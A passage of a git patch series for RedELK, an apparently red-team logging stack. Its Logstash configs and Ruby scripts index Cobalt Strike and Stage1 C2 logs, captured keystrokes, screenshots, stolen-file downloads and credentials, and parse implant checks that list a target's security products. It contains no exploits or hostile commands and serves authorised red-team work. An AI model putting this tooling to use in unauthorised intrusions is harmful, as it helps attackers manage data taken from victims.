"[pstools][psx][security_products]" => "%{GREEDYDATA}Vendor:\t (?<[pstools][psx][edr_name]>(.|\r|\n)*)" } + } + # clean up the tab and "Product" string + mutate { + gsub => ["[pstools][psx][edr_name]", "\n Product:\t", " -"] + } + # now duplicate this specific log line to record into bluecheck index - remove useless info for that index + # also copy the value from [pstools][psx][security_products] to [message] + clone { + clones => [ "bluecheck" ] + remove_field => [ "[agent][ephemeral_id]","[agent][hostname]","[agent][id]","[agent][name]","[agent][type]","[agent][version]","[c2][log][type]","[c2][message]","[c2][program]","[c2][timestamp]","[event][action]","[event][category]","[event][dataset]","[event][end]","[event][enriched_from]","[event][ingested]","[event][kind]","[event][module]","[event][start]","[host]","[implant][output]","[infra][log][type]","[input][type]","[log][file][path]","[log][flags]","[log][offset]","[message]","[process][name]","[process][pid]","[pstools][full_output]","[pstools][psx][processes]","[pstools][psx][summary]","[user][name]" ] + add_field => { "[message]" => "%{[pstools][psx][security_products]}" } + } + } + + } else if "Output from Outflank PSK" in [pstools][full_output] { + grok { + match => { "[pstools][full_output]" => "\[V\] Output from Outflank %{WORD:[pstools][tool]} version %{NUMBER:[pstools][version]}\)\\n\\n%{GREEDYDATA:[pstools][header]}\\n\\n%{GREEDYDATA:[pstools][items]}\[F\]%{GREEDYDATA:[pstools][footer]}" } + } + } else if "Output from Outflank PSC" in [pstools][full_output] { + grok { + match => { "[pstools][full_output]" => "\[V\] Output from Outflank %{WORD:[pstools][tool]} version %{NUMBER:[pstools][version]}\)\\n\\n%{GREEDYDATA:[pstools][items]}\[F\]%{GREEDYDATA:[pstools][footer]}" } + } + } else if "Output from Outflank PSM" in [pstools][full_output] { + grok { + match => { "[pstools][full_output]" => "\[V\] Output from Outflank %{WORD:[pstools][tool]} version %{NUMBER:[pstools][version]}\)\\n\\n%{GREEDYDATA:[pstools][items]}\[F\]%{GREEDYDATA:[pstools][footer]}" } + } + } else if "Output from Outflank PSH" in [pstools][full_output] { + grok { + match => { "[pstools][full_output]" => "\[V\] Output from Outflank %{WORD:[pstools][tool]} version %{NUMBER:[pstools][version]}\)\\n\\n%{GREEDYDATA:[pstools][items]}\[F\]%{GREEDYDATA:[pstools][footer]}" } + } + } else if "Output from Outflank PSW" in [pstools][full_output] { + grok { + match => { "[pstools][full_output]" => "\[V\] Output from Outflank %{WORD:[pstools][tool]} version %{NUMBER:[pstools][version]}\)\\n\\n%{GREEDYDATA:[pstools][items]}\[F\]%{GREEDYDATA:[pstools][footer]}" } + } + } + } +} \ No newline at end of file diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf new file mode 100644 index 00000000..9c2957fe --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf @@ -0,0 +1,31 @@ +# Part of RedELK +# +# In this file we parse the file with the domain classification cheks +# +# Author: Outflank B.V. / Marc Smeets +# + +filter { + if [type] == "bluecheck" { + + if [bluechecktype] == "roguedomaincheck" { + grok { + match => { "message" => "(?%{YEAR}\/%{MONTHNUM}\/%{MONTHDAY}, %{HOUR}\:%{MINUTE}\:%{SECOND}) Domain\: %{IPORHOST:domain} Source\: %{GREEDYDATA:classifier} Results\: %{GREEDYDATA:results}" } + } + date { + match => [ "bluechecktimestamp", "YYYY/MM/dd, HH:mm:ss" ] + target => "@timestamp" + timezone => "Etc/UTC" + } + mutate { + remove_field => [ "host" ] + } + } + + if [pstools][psx][edr_name] { + mutate { + add_field => { "bluechecktype" => "psx"} + } + } + } +} \ No newline at end of file diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/99-outputs_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/99-outputs_logstash.conf new file mode 100644 index 00000000..cc4177ed --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/99-outputs_logstash.conf @@ -0,0 +1,103 @@ +# Part of RedELK +# +# In this file we configure the logstash outputs +# +# Author: Outflank B.V. / Marc Smeets +# + +output { + if [infra][log][type] == "rtops" { + elasticsearch { + hosts => ["redelk-elasticsearch:9200"] + sniffing => true + manage_template => false + # ilm_enabled => true + # ilm_rollover_alias => "rtops" + # ilm_policy => "redelk" + # template_name => "rtops" + ilm_enabled => false + index => "rtops-%{+YYYY.MM.dd}" + user => ["redelk_ingest"] + password => ["${CREDS_redelk_ingest}"] + ssl => true + cacert => "${CERTS_LOGSTASH_OUTPUT_CA}" + ssl_certificate_verification => false + } + } + + if [type] == "implantsdb" { + elasticsearch { + hosts => ["redelk-elasticsearch:9200"] + sniffing => true + manage_template => false + ilm_enabled => false + index => "implantsdb" + user => ["redelk_ingest"] + password => ["${CREDS_redelk_ingest}"] + ssl => true + cacert => "${CERTS_LOGSTASH_OUTPUT_CA}" + ssl_certificate_verification => false + } + } + + if [infra][log][type] == "redirtraffic" { + elasticsearch { + hosts => ["redelk-elasticsearch:9200"] + sniffing => true + manage_template => false + # ilm_enabled => true + # ilm_rollover_alias => "redirtraffic" + # ilm_policy => "redelk" + # template_name => "redirtraffic" + ilm_enabled => false + index => "redirtraffic-%{+YYYY.MM.dd}" + user => ["redelk_ingest"] + password => ["${CREDS_redelk_ingest}"] + ssl => true + cacert => "${CERTS_LOGSTASH_OUTPUT_CA}" + ssl_certificate_verification => false + } + } + + if [c2][log][type] == "credentials" { + elasticsearch { + hosts => ["redelk-elasticsearch:9200"] + sniffing => true + manage_template => false + index => "credentials-%{+YYYY.MM.dd}" + user => ["redelk_ingest"] + password => ["${CREDS_redelk_ingest}"] + ssl => true + cacert => "${CERTS_LOGSTASH_OUTPUT_CA}" + ssl_certificate_verification => false + } + } + + if [type] == "bluecheck" { + elasticsearch { + hosts => ["redelk-elasticsearch:9200"] + sniffing => true + manage_template => false + index => "bluecheck-%{+YYYY.MM.dd}" + user => ["redelk_ingest"] + password => ["${CREDS_redelk_ingest}"] + ssl => true + cacert => "${CERTS_LOGSTASH_OUTPUT_CA}" + ssl_certificate_verification => false + } + } + + if [infralogtype] == "email" { + elasticsearch { + hosts => ["redelk-elasticsearch:9200"] + sniffing => true + manage_template => false + index => "email-%{+YYYY.MM.dd}" + user => ["redelk_ingest"] + password => ["${CREDS_redelk_ingest}"] + ssl => true + cacert => "${CERTS_LOGSTASH_OUTPUT_CA}" + ssl_certificate_verification => false + } + } +} diff --git a/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makebeaconlogpath.rb b/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makebeaconlogpath.rb new file mode 100644 index 00000000..15da449c --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makebeaconlogpath.rb @@ -0,0 +1,18 @@ +# +# Part of RedELK +# Script to have logstash insert an extra field pointing to the full TXT file of a Cobalt Strike keystrokes file +# +# Author: Outflank B.V. / Marc Smeets +# + +def filter(event) + host = event.get("[agent][name]") + logpath = event.get("[log][file][path]") + implant_id = event.get("[implant][id]") + temppath = logpath.split('/cobaltstrike') + temppath2 = temppath[1].split(/\/([^\/]*)$/) + implantlogpath = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath[1]}" + event.tag("_rubyparseok") + event.set("[implant][log_file]", implantlogpath) + return [event] +end diff --git a/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makedownloadspath.rb b/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makedownloadspath.rb new file mode 100644 index 00000000..2596ec19 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makedownloadspath.rb @@ -0,0 +1,20 @@ +# +# Part of RedELK +# Script to have logstash insert an extra field pointing to the Cobalt Strike downloaded file +# +# Author: Outflank B.V. / Marc Smeets +# + +def filter(event) + host = event.get("[agent][name]") + logpath = event.get("[log][file][path]") + implant_id = event.get("[implant][id]") + filename = event.get("[file][name]") + file_path = event.get("[file][directory_local]") + file_patharray = file_path.split(/\/([^\/]*)$/) + file_id = file_patharray[-1] + downloadsurl = "/c2logs/" + "#{host}" + "/cobaltstrike/downloads/" + "#{file_id}" + "_" + "#{filename}" + event.tag("_rubyparseok") + event.set("[file][url]", downloadsurl) + return [event] +end diff --git a/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makekeystrokespath.rb b/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makekeystrokespath.rb new file mode 100644 index 00000000..050ccc4c --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makekeystrokespath.rb @@ -0,0 +1,20 @@ +# +# Part of RedELK +# Script to have logstash insert an extra field pointing to the full TXT file of a Cobalt Strike keystrokes file +# Cobalt Strike 4.2 and higher +# +# Author: Outflank B.V. / Marc Smeets +# + +def filter(event) + host = event.get("[agent][name]") + logpath = event.get("[log][file][path]") + implant_id = event.get("[implant][id]") + desktop_session = event.get("[keystrokes][desktop_session]") + temppath = logpath.split('/cobaltstrike') + temppath2 = temppath[1].split(/\/([^\/]*)$/) + keystrokespath = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath2[0]}" + "/keystrokes_" + "#{implant_id}" + "." + "#{desktop_session}" + ".txt" + event.tag("_rubyparseok") + event.set("[keystrokes][url]", keystrokespath) + return [event] +end diff --git a/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makekeystrokespath_beforecs4.2.rb b/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makekeystrokespath_beforecs4.2.rb new file mode 100644 index 00000000..a599c7aa --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makekeystrokespath_beforecs4.2.rb @@ -0,0 +1,19 @@ +# +# Part of RedELK +# Script to have logstash insert an extra field pointing to the full TXT file of a Cobalt Strike keystrokes file +# Before Cobalt Strike 4.2 +# +# Author: Outflank B.V. / Marc Smeets +# + +def filter(event) + host = event.get("[agent][name]") + logpath = event.get("[log][file][path]") + implant_id = event.get("[implant][id]") + temppath = logpath.split('/cobaltstrike') + temppath2 = temppath[1].split(/\/([^\/]*)$/) + keystrokespath = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath2[0]}" + "/keystrokes_" + "#{implant_id}" + ".txt" + event.tag("_rubyparseok") + event.set("[keystrokes][url]", keystrokespath) + return [event] +end diff --git a/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makescreenshotpath.rb b/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makescreenshotpath.rb new file mode 100644 index 00000000..5ac0622e --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makescreenshotpath.rb @@ -0,0 +1,21 @@ +# +# Part of RedELK +# Script to have logstash insert extra fields pointing to the Cobalt Strike screenshots +# Cobalt Strike 4.2 and higher +# +# Author: Outflank B.V. / Marc Smeets +# + +def filter(event) + host = event.get("[agent][name]") + logpath = event.get("[log][file][path]") + filename = event.get("[screenshot][file_name]") + temppath = logpath.split('/cobaltstrike') + temppath2 = temppath[1].split(/\/([^\/]*)$/) + screenshoturl = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath2[0]}" + "/screenshots/"+ "#{filename}" + thumburl = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath2[0]}" + "/screenshots/"+ "#{filename}" + ".thumb.jpg" + event.tag("_rubyparseok") + event.set("[screenshot][full]", screenshoturl) + event.set("[screenshot][thumb]", thumburl) + return [event] +end \ No newline at end of file diff --git a/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makescreenshotpath_beforecs4.2.rb b/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makescreenshotpath_beforecs4.2.rb new file mode 100644 index 00000000..9dfefa5d --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/scripts/cs_makescreenshotpath_beforecs4.2.rb @@ -0,0 +1,24 @@ +# +# Part of RedELK +# Script to have logstash insert extra fields pointing to the Cobalt Strike screenshots +# before Cobalt Strike 4.2 +# +# Author: Outflank B.V. / Marc Smeets +# + +def filter(event) + require 'time' + host = event.get("[agent][name]") + logpath = event.get("[log][file][path]") + implant_id = event.get("[implant][id]") + timefromcs = event.get("[c2][timestamp]") + " UTC" + timestring = Time.parse(timefromcs).strftime("%I%M%S") + temppath = logpath.split('/cobaltstrike') + temppath2 = temppath[1].split(/\/([^\/]*)$/) + screenshoturl = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath2[0]}" + "/screenshots/screen_" + "#{timestring}" + "_" + "#{implant_id}" + ".jpg" + thumburl = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath2[0]}" + "/screenshots/screen_" + "#{timestring}" + "_" + "#{implant_id}" + ".jpg.thumb.jpg" + event.tag("_rubyparseok") + event.set("[screenshot][full]", screenshoturl) + event.set("[screenshot][thumb]", thumburl) + return [event] +end diff --git a/elkserver/mounts/logstash-config/redelk-main/scripts/outflankstage1_makedownloadspath.rb b/elkserver/mounts/logstash-config/redelk-main/scripts/outflankstage1_makedownloadspath.rb new file mode 100644 index 00000000..5c139db1 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/scripts/outflankstage1_makedownloadspath.rb @@ -0,0 +1,19 @@ +# +# Part of RedELK +# Script to have logstash insert an extra field pointing to downloaded file via Outflank Stage1 C2 +# +# Author: Outflank B.V. / Marc Smeets +# + + +def filter(event) + host = event.get("[agent][name]") + logpath = event.get("[log][file][path]") + implant_id = event.get("[implant][id]") + filename = event.get("[file][name]") + file_path = event.get("[file][directory_local]") + downloadsurl = "/c2logs/" + "#{host}" + "/stage1/downloads/" + "#{file_path}" + "_" + "#{filename}" + event.tag("_rubyparseok") + event.set("[file][url]", downloadsurl) + return [event] +end \ No newline at end of file diff --git a/elkserver/mounts/logstash-config/redelk-main/scripts/outflankstage1_makelogpath.rb b/elkserver/mounts/logstash-config/redelk-main/scripts/outflankstage1_makelogpath.rb new file mode 100644 index 00000000..19feba89 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/scripts/outflankstage1_makelogpath.rb @@ -0,0 +1,17 @@ +# +# Part of RedELK +# Script to have logstash insert an extra field pointing to the full TXT file of a Outflank Stage 1 C2 implant log file +# +# Author: Outflank B.V. / Marc Smeets +# + +def filter(event) + host = event.get("[agent][name]") + logpath = event.get("[log][file][path]") + implant_id = event.get("[implant][id]") + temppath = logpath.split('/logs') + implantlogpath = "/c2logs/" + "#{host}" + "/stage1/logs" + "#{temppath[1]}" + event.tag("_rubyparseok") + event.set("[implant][log_file]", implantlogpath) + return [event] +end From 6a5cee24d913fd59e6e27f5766221c3690cc57b0 Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Wed, 19 Jan 2022 23:56:47 +0100 Subject: [PATCH 11/18] logstash bluecheck update --- ...ilter-bluecheck_domainchecks_logstash.conf | 79 ++++++++++++++++++- 1 file changed, 78 insertions(+), 1 deletion(-) diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf index 9c2957fe..4294788f 100644 --- a/elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf @@ -1,13 +1,90 @@ # Part of RedELK # -# In this file we parse the file with the domain classification cheks +# In this file we parse the output of BLUECHECK tools # # Author: Outflank B.V. / Marc Smeets # filter { + ## First we check if we have new fields that are bluecheck related and have the 'type' not set to bluecheck + # + if "BLUECHECK" in [implant][output] { + clone { + clones => [ "bluecheck" ] + remove_field => [ "[c2][log][type]","[infra][log][type]" ] + } + + # check if bluechecktype should be set to sslcert + if "SSL Certicate" in [implant][output] { + mutate { + add_field => { "bluechecktype" => "sslcert"} + } + + # check if bluechecktype should be set to pwchange + if "BLUECHECK Password" in [implant][output] { + mutate { + add_field => { "bluechecktype" => "pwchange"} + } + + # check if bluechecktype should be set to sectools + if "BLUECHECK Security Tools Check" in [implant][output] { + mutate { + add_field => { "bluechecktype" => "sectools"} + } + + + } + + ## Now parse fields with type == bluecheck if [type] == "bluecheck" { + # parse output of sslcert checks + if [bluechecktype] == "sslcert" { + grok { + match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK SSL Certificate\: (?<[bluecheck][message]>(.|\r|\n)*)\[\+\] Check Finished" } + } + grok { + match => { "[bluecheck][message]" => "%{URI:[bluecheck][uri]}%{GREEDYDATA} Subject Information:\\n%{GREEDYDATA:[bluecheck][certsubject]}\\n\[\+\] Issuer Information\:\\n%{GREEDYDATA:[bluecheck][certissuer]}\\n" } + } + } + + # parse output of PasswordChangeCheck + if [bluechecktype] == "pwchange" { + grok { + match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Password\: (?<[bluecheck][message]>(.|\r|\n)*)\n" } + } + grok { + match => { "[bluecheck][message]" => "(?<[bluecheck][accountname]>(.|\r|\n)*) password last changed at\: (?<[bluecheck][pwchangedate]>%{MONTHNUM}\/%{MONTHDAY}\/%{YEAR} %{HOUR}\:%{MINUTE}\:%{SECOND}), account %{WORD:[bluecheck][accountstate]}." } + } + date { + match => [ "[bluecheck][pwchangedate]", "MM/dd/YYYY HH:mm:ss" ] + target => "@timestamp" + timezone => "Etc/UTC" + } + } + + # parse output of sectools checks + if [bluechecktype] == "sectools" { + grok { + match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Security Tools check\:\n(?<[bluecheck][message]>(.|\r|\n)*)\[\+\] Check Finished" } + } + grok { + match => { "[bluecheck][message]" => "\[\+\] Security products found: %{INT:[bluecheck][sectoolsamount]}\\n%{GREEDYDATA:[bluecheck][sectools]}\\n\\n" } + } + # TODO cleanup the list of sectools + #mutate { + # gsub => ["[bluecheck][sectools]]", "\n Product:\t", " -"] + # } + + } + + + + + + # roguedomaincheck is different in the sense that data is read from config file elkserver/mounts/redelk-config/etc/redelk/redteamdomains.conf + # filebeat already sets the type field; there is no event from rtops duplicated. + # parse output of roguedomaincheck if [bluechecktype] == "roguedomaincheck" { grok { match => { "message" => "(?%{YEAR}\/%{MONTHNUM}\/%{MONTHDAY}, %{HOUR}\:%{MINUTE}\:%{SECOND}) Domain\: %{IPORHOST:domain} Source\: %{GREEDYDATA:classifier} Results\: %{GREEDYDATA:results}" } From 119a04606cc6f0173f4dda2358acc9416aec0298 Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Sat, 22 Jan 2022 15:43:03 +0100 Subject: [PATCH 12/18] bluecheck update sectools update --- .../conf.d/80-filter-bluecheck_logstash.conf | 132 ++++++++++++++++++ .../scripts/bluecheck_make_sectools_object.rb | 22 +++ 2 files changed, 154 insertions(+) create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/scripts/bluecheck_make_sectools_object.rb diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_logstash.conf new file mode 100644 index 00000000..5cf8917e --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_logstash.conf @@ -0,0 +1,132 @@ +# Part of RedELK +# +# In this file we parse the output of BLUECHECK tools +# +# Author: Outflank B.V. / Marc Smeets +# + +filter { + ## First we check if we have new fields that are bluecheck related and have the 'type' not set to bluecheck + # + if "BLUECHECK" in [implant][output] { + clone { + clones => [ "bluecheck" ] + remove_field => [ "[c2][log][type]","[infra][log][type]" ] + } + } + + ## Now parse only fields with type == bluecheck + ## + + if [type] == "bluecheck" { + + # parse output of sslcert checks + if "BLUECHECK SSL Certificate" in [implant][output] { + # add bluechecktype + mutate { + add_field => { "bluechecktype" => "sslcert"} + } + + # make [bluecheck][message] + grok { + match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK SSL Certificate\: (?<[bluecheck][message]>(.|\r|\n)*)\[\+\] Check Finished" } + } + + # parse [bluecheck][message] + grok { + match => { "[bluecheck][message]" => "%{URI:[bluecheck][uri]}%{GREEDYDATA}\n\[\+\] Subject Information\:\n(?<[bluecheck][certsubject]>(.|\r|\n)*)\n\[\+\] Issuer Information\:\n(?<[bluecheck][certissuer]>(.|\r|\n)*)" } + } + + # cleanup the specific fields + mutate { + gsub => ["[bluecheck][certsubject]", "\n", ","] + } + mutate { + gsub => ["[bluecheck][certsubject]", "\r", ""] + } + mutate { + gsub => ["[bluecheck][certissuer]", "\n", ","] + } + mutate { + gsub => ["[bluecheck][certissuer]", "\r", ""] + } + } + + # parse output of PasswordChangeCheck + if "BLUECHECK Password" in [implant][output] { + mutate { + add_field => { "bluechecktype" => "pwchange"} + } + + grok { + match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Password\: (?<[bluecheck][message]>(.|\r|\n)*)\n\[\+\] Check Finished" } + } + + grok { + match => { "[bluecheck][message]" => "(?<[bluecheck][accountname]>(.|\r|\n)*) password last changed at\: (?<[bluecheck][pwchangedate]>%{MONTHNUM}-%{MONTHDAY}-%{YEAR} %{HOUR}\:%{MINUTE}\:%{SECOND}), %{GREEDYDATA:[bluecheck][accountstate]}." } + } + + date { + match => [ "[bluecheck][pwchangedate]", "MM-dd-YYYY HH:mm:ss" ] + target => "[bluecheck][pwchangedate]" + } + } + + # parse output of sectools checks + if "BLUECHECK Security Tools Check" in [implant][output] { + + mutate { + add_field => { "bluechecktype" => "sectools"} + } + + grok { + match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Security Tools Check\:\n(?<[bluecheck][message]>(.|\r|\n)*)\[\+\] Check Finished" } + } + + grok { + match => { "[bluecheck][message]" => "\[\+\] Security products found: %{INT:[bluecheck][sectoolsamount]}\n%{GREEDYDATA:[bluecheck][sectools]}\n\n" } + } + + # TODO cleanup the list of sectools + mutate { + gsub => ["[bluecheck][sectools]", " ", ""] + } + mutate { + gsub => ["[bluecheck][sectools]", "\t", ""] + } + mutate { + gsub => ["[bluecheck][sectools]", "\n\n", ","] + } + mutate { + gsub => ["[bluecheck][sectools]", "\n", " "] + } + ruby { + path => "/usr/share/logstash/redelk-main/scripts/bluecheck_make_sectools_object.rb" + } + + } + + # roguedomaincheck is different in the sense that data is read from config file elkserver/mounts/redelk-config/etc/redelk/redteamdomains.conf + # filebeat already sets the type field; there is no event from rtops duplicated. + # parse output of roguedomaincheck + if [bluechecktype] == "roguedomaincheck" { + grok { + match => { "message" => "(?%{YEAR}\/%{MONTHNUM}\/%{MONTHDAY}, %{HOUR}\:%{MINUTE}\:%{SECOND}) Domain\: %{IPORHOST:domain} Source\: %{GREEDYDATA:classifier} Results\: %{GREEDYDATA:results}" } + } + date { + match => [ "bluechecktimestamp", "YYYY/MM/dd, HH:mm:ss" ] + target => "@timestamp" + timezone => "Etc/UTC" + } + mutate { + remove_field => [ "host" ] + } + } + + if [pstools][psx][edr_name] { + mutate { + add_field => { "bluechecktype" => "psx"} + } + } + } +} \ No newline at end of file diff --git a/elkserver/mounts/logstash-config/redelk-main/scripts/bluecheck_make_sectools_object.rb b/elkserver/mounts/logstash-config/redelk-main/scripts/bluecheck_make_sectools_object.rb new file mode 100644 index 00000000..a9071590 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/scripts/bluecheck_make_sectools_object.rb @@ -0,0 +1,22 @@ +# +# Part of RedELK +# Script to make a json object to be stored as nested object of all found security tools +# +# Author: Outflank B.V. / Marc Smeets +# + +def filter(event) + string = event.get("[bluecheck][sectools]") + string2 = string.gsub("ProcessID","{ \"ProcessID\"") + string3 = string2.gsub(" Vendor",", \"Vendor\"") + string4 = string3.gsub(" Product",", \"Product\"") + string5 = string4.gsub(",{","},{") + string6 = string5.gsub(": ",": \"") + string7 = string6.gsub(", ","\", ") + string8 = string7.gsub("},","\"},") + string9 = "["+string8+"\" }]" + json = JSON.parse(string9) + event.tag("_rubyparseok") + event.set("[bluecheck][sectools]", json) + return [event] +end From 017ae1dc3176740ab10825dd0a0ba17ee07aa7c7 Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Mon, 24 Jan 2022 22:32:40 +0100 Subject: [PATCH 13/18] cleanup after moving of logstash config files to live mount --- .../conf.d/80-filter-bluecheck_logstash.conf | 132 ------------------ .../scripts/bluecheck_make_sectools_object.rb | 22 --- ...ilter-bluecheck_domainchecks_logstash.conf | 108 -------------- 3 files changed, 262 deletions(-) delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_logstash.conf delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/bluecheck_make_sectools_object.rb delete mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_logstash.conf deleted file mode 100644 index 5cf8917e..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_logstash.conf +++ /dev/null @@ -1,132 +0,0 @@ -# Part of RedELK -# -# In this file we parse the output of BLUECHECK tools -# -# Author: Outflank B.V. / Marc Smeets -# - -filter { - ## First we check if we have new fields that are bluecheck related and have the 'type' not set to bluecheck - # - if "BLUECHECK" in [implant][output] { - clone { - clones => [ "bluecheck" ] - remove_field => [ "[c2][log][type]","[infra][log][type]" ] - } - } - - ## Now parse only fields with type == bluecheck - ## - - if [type] == "bluecheck" { - - # parse output of sslcert checks - if "BLUECHECK SSL Certificate" in [implant][output] { - # add bluechecktype - mutate { - add_field => { "bluechecktype" => "sslcert"} - } - - # make [bluecheck][message] - grok { - match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK SSL Certificate\: (?<[bluecheck][message]>(.|\r|\n)*)\[\+\] Check Finished" } - } - - # parse [bluecheck][message] - grok { - match => { "[bluecheck][message]" => "%{URI:[bluecheck][uri]}%{GREEDYDATA}\n\[\+\] Subject Information\:\n(?<[bluecheck][certsubject]>(.|\r|\n)*)\n\[\+\] Issuer Information\:\n(?<[bluecheck][certissuer]>(.|\r|\n)*)" } - } - - # cleanup the specific fields - mutate { - gsub => ["[bluecheck][certsubject]", "\n", ","] - } - mutate { - gsub => ["[bluecheck][certsubject]", "\r", ""] - } - mutate { - gsub => ["[bluecheck][certissuer]", "\n", ","] - } - mutate { - gsub => ["[bluecheck][certissuer]", "\r", ""] - } - } - - # parse output of PasswordChangeCheck - if "BLUECHECK Password" in [implant][output] { - mutate { - add_field => { "bluechecktype" => "pwchange"} - } - - grok { - match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Password\: (?<[bluecheck][message]>(.|\r|\n)*)\n\[\+\] Check Finished" } - } - - grok { - match => { "[bluecheck][message]" => "(?<[bluecheck][accountname]>(.|\r|\n)*) password last changed at\: (?<[bluecheck][pwchangedate]>%{MONTHNUM}-%{MONTHDAY}-%{YEAR} %{HOUR}\:%{MINUTE}\:%{SECOND}), %{GREEDYDATA:[bluecheck][accountstate]}." } - } - - date { - match => [ "[bluecheck][pwchangedate]", "MM-dd-YYYY HH:mm:ss" ] - target => "[bluecheck][pwchangedate]" - } - } - - # parse output of sectools checks - if "BLUECHECK Security Tools Check" in [implant][output] { - - mutate { - add_field => { "bluechecktype" => "sectools"} - } - - grok { - match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Security Tools Check\:\n(?<[bluecheck][message]>(.|\r|\n)*)\[\+\] Check Finished" } - } - - grok { - match => { "[bluecheck][message]" => "\[\+\] Security products found: %{INT:[bluecheck][sectoolsamount]}\n%{GREEDYDATA:[bluecheck][sectools]}\n\n" } - } - - # TODO cleanup the list of sectools - mutate { - gsub => ["[bluecheck][sectools]", " ", ""] - } - mutate { - gsub => ["[bluecheck][sectools]", "\t", ""] - } - mutate { - gsub => ["[bluecheck][sectools]", "\n\n", ","] - } - mutate { - gsub => ["[bluecheck][sectools]", "\n", " "] - } - ruby { - path => "/usr/share/logstash/redelk-main/scripts/bluecheck_make_sectools_object.rb" - } - - } - - # roguedomaincheck is different in the sense that data is read from config file elkserver/mounts/redelk-config/etc/redelk/redteamdomains.conf - # filebeat already sets the type field; there is no event from rtops duplicated. - # parse output of roguedomaincheck - if [bluechecktype] == "roguedomaincheck" { - grok { - match => { "message" => "(?%{YEAR}\/%{MONTHNUM}\/%{MONTHDAY}, %{HOUR}\:%{MINUTE}\:%{SECOND}) Domain\: %{IPORHOST:domain} Source\: %{GREEDYDATA:classifier} Results\: %{GREEDYDATA:results}" } - } - date { - match => [ "bluechecktimestamp", "YYYY/MM/dd, HH:mm:ss" ] - target => "@timestamp" - timezone => "Etc/UTC" - } - mutate { - remove_field => [ "host" ] - } - } - - if [pstools][psx][edr_name] { - mutate { - add_field => { "bluechecktype" => "psx"} - } - } - } -} \ No newline at end of file diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/bluecheck_make_sectools_object.rb b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/bluecheck_make_sectools_object.rb deleted file mode 100644 index a9071590..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/bluecheck_make_sectools_object.rb +++ /dev/null @@ -1,22 +0,0 @@ -# -# Part of RedELK -# Script to make a json object to be stored as nested object of all found security tools -# -# Author: Outflank B.V. / Marc Smeets -# - -def filter(event) - string = event.get("[bluecheck][sectools]") - string2 = string.gsub("ProcessID","{ \"ProcessID\"") - string3 = string2.gsub(" Vendor",", \"Vendor\"") - string4 